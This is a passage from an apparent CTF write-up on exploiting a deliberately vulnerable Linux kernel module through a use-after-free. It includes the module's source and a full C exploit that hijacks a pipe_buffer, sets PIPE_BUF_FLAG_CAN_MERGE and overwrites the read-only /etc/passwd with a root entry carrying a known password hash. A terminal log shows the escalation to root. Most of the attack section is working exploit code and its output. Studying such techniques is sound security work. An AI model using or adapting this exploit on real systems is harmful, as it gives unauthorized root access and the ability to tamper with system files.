if (copy_from_user(&req, (void *)arg, sizeof(req)) != 0) {
return -1;
}
mutex_lock(&module_lock);
switch(cmd) {
case CMD_ALLOC:
ret = obj_alloc();
break;
case CMD_READ:
ret = obj_read(req.data, req.size);
break;
case CMD_WRITE:
ret = obj_write(req.data, req.size);
break;
case CMD_FREE:
ret = obj_free();
break;
default:
ret = -1;
break;
}
mutex_unlock(&module_lock);
return ret;
}
static struct file_operations module_fops = {
.unlocked_ioctl = module_ioctl,
};
static struct miscdevice vuln_dev = {
.minor = MISC_DYNAMIC_MINOR,
.name = "vuln",
.fops = &module_fops
};
static int __init module_initialize(void) {
if (misc_register(&vuln_dev) != 0) {
return -1;
}
return 0;
}
static void __exit module_cleanup(void) {
misc_deregister(&vuln_dev);
mutex_destroy(&module_lock);
}
```
This implements the ioctl commands. Alloc always kzallocs a fixed 0x400-byte object (kmalloc-1k), and the free path never clears the pointer, so we have a UAF.
```c
#define CMD_ALLOC 0xf000
#define CMD_READ 0xf001
#define CMD_WRITE 0xf002
#define CMD_FREE 0xf003
#define OBJ_SIZE 0x400
typedef struct {
size_t size;
char *data;
} request_t;
struct obj {
char buf[OBJ_SIZE];
};
static struct obj *obj = NULL;
static DEFINE_MUTEX(module_lock);
static long obj_alloc(void) {
if (obj != NULL) {
return -1;
}
obj = kzalloc(sizeof(struct obj), GFP_KERNEL);
if (obj == NULL) {
return -1;
}
return 0;
}
static long obj_read(char *data, size_t size) {
if (obj == NULL || size > OBJ_SIZE) {
return -1;
}
if (copy_to_user(data, obj->buf, size) != 0) {
return -1;
}
return 0;
}
static long obj_write(char *data, size_t size) {
if (obj == NULL || size > OBJ_SIZE) {
return -1;
}
if (copy_from_user(obj->buf, data, size) != 0) {
return -1;
}
return 0;
}
static long obj_free(void) {
kfree(obj);
return 0;
}
```
### attack
First alloc and then free to create a UAF chunk, then call pipe so that the pipe_buffer array is allocated into that UAF chunk. Next, splice `/etc/passwd` into the pipe fd (its struct page is now shared with a pipe_buffer). Use the UAF read to dump the pipe_buffer, then use the UAF write to turn on `PIPE_BUF_FLAG_CAN_MERGE` in its flags. Now an appending write to the pipe lands directly in the struct page backing the read-only `/etc/passwd`; log in again with the modified password to get root.
### exploit
```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <time.h>
#include <assert.h>
#include <stdint.h>
#include <sched.h>
#include <unistd.h>
#include <sys/mman.h>
// gcc exploit.c -o exploit --static -masm=intel
#define CMD_ALLOC 0xf000
#define CMD_READ 0xf001
#define CMD_WRITE 0xf002
#define CMD_FREE 0xf003
typedef struct {
size_t size;
char *data;
} request_t;
int fd;
int etcpasswd_fd;
void obj_alloc() {
request_t req = {};
ioctl(fd, CMD_ALLOC, &req);
}
void obj_write(size_t size, char* data) {
request_t req = {
.size = size,
.data = data
};
ioctl(fd, CMD_WRITE, &req);
}
void obj_read(size_t size, char* data) {
request_t req = {
.size = size,
.data = data
};
ioctl(fd, CMD_READ, &req);
}
void obj_free() {
request_t req = {};
ioctl(fd, CMD_FREE, &req);
}
void show_zoneinfo()
{
FILE *fp = fopen("/proc/zoneinfo", "r");
char line[256];
int in_pagesets = 0;
int current_cpu = -1;
while (fgets(line, sizeof(line), fp)) {
if (strstr(line, "pagesets")) {
in_pagesets = 1;
continue;
}
if (in_pagesets && line[0] != ' ' && line[0] != '\t') {
in_pagesets = 0;
continue;
}
if (in_pagesets) {
int cpu_id;
if (sscanf(line, " cpu: %d", &cpu_id) == 1) {
current_cpu = cpu_id;
}
int count_val;
if (sscanf(line, " count: %d", &count_val) == 1 && current_cpu != -1) {
printf("CPU %d -> count = %d\n", current_cpu, count_val);
}
}
}
fclose(fp);
}
struct pipe_buffer {
void *page;
unsigned int offset;
unsigned int len;
const void *ops;
unsigned int flags;
unsigned long private;
};
#define PIPE_BUF_FLAG_CAN_MERGE 0x10
int main(){
fd = open("/dev/vuln", O_RDONLY);
if (fd == -1){
puts("Open /dev/vuln failed");
exit(0);
}
etcpasswd_fd = open("/etc/passwd", O_RDONLY);
if (etcpasswd_fd == -1) {
puts("Open /etc/passwd failed");
exit(0);
}
obj_alloc();
obj_free();
int pipefd[2];
// create a pipe so its pipe_buffer array reuses the UAF'd chunk
pipe(pipefd);
/*
ssize_t splice(int fd_in, off_t *_Nullable off_in,
int fd_out, off_t *_Nullable off_out,
size_t size, unsigned int flags);
*/
off64_t offset = 0;
splice(etcpasswd_fd, &offset, pipefd[1], NULL, 1, 0);
struct pipe_buffer my_evil_pipe_buffer;
obj_read(sizeof(my_evil_pipe_buffer), (char*)&my_evil_pipe_buffer);
printf(
"[+] .page = %p, .offset = %#x, .len = %#x, .ops = %p, .flags = %#x, .private = %#lx\n",
my_evil_pipe_buffer.page,
my_evil_pipe_buffer.offset,
my_evil_pipe_buffer.len,
my_evil_pipe_buffer.ops,
my_evil_pipe_buffer.flags,
my_evil_pipe_buffer.private
);
/*
Overwrite flags and len
*/
my_evil_pipe_buffer.len = 0;
my_evil_pipe_buffer.flags = PIPE_BUF_FLAG_CAN_MERGE;
obj_write(sizeof(my_evil_pipe_buffer), (char*)&my_evil_pipe_buffer);
obj_read(sizeof(my_evil_pipe_buffer), (char*)&my_evil_pipe_buffer);
printf(
"[+] .page = %p, .offset = %#x, .len = %#x, .ops = %p, .flags = %#x, .private = %#lx\n",
my_evil_pipe_buffer.page,
my_evil_pipe_buffer.offset,
my_evil_pipe_buffer.len,
my_evil_pipe_buffer.ops,
my_evil_pipe_buffer.flags,
my_evil_pipe_buffer.private
);
char payload[] = "root:$1$naup$tZAttOyVXnz7BlRCnYsuv/:0:0:root:/root:/bin/sh";
int ret = write(pipefd[1], payload, sizeof(payload));
if (ret == -1) {
puts("Failed to write /etc/passwd");
exit(0);
}
return 0;
}
/*
~ $ id
uid=1000(ctf) gid=1000 groups=1000
~ $ ./exploit
[+] .page = 0xfffffb04000d4c40, .offset = 0, .len = 0x1, .ops = 0xffffffff8f215320, .flags = 0, .private = 0
[+] .page = 0xfffffb04000d4c40, .offset = 0, .len = 0, .ops = 0xffffffff8f215320, .flags = 0x10, .private = 0
~ $ cat /etc/passwd
root:$1$naup$tZAttOyVXnz7BlRCnYsuv/:0:0:root:/root:/bin/sh:/home/ctf:/bin/sh
~ $ su
Password:
/ # id
uid=0(root) gid=0(root) groups=0(root)
*/
```
## pagejack
https://i.blackhat.com/BH-US-24/Presentations/US24-Qian-PageJack-A-Powerful-Exploit-Technique-With-Page-Level-UAF-Thursday.pdf
## after all
Once again I'm reminded that flipping even a single bit of memory inside the kernel can have a huge impact XD
## others
https://www.interruptlabs.co.uk/articles/pipe-buffer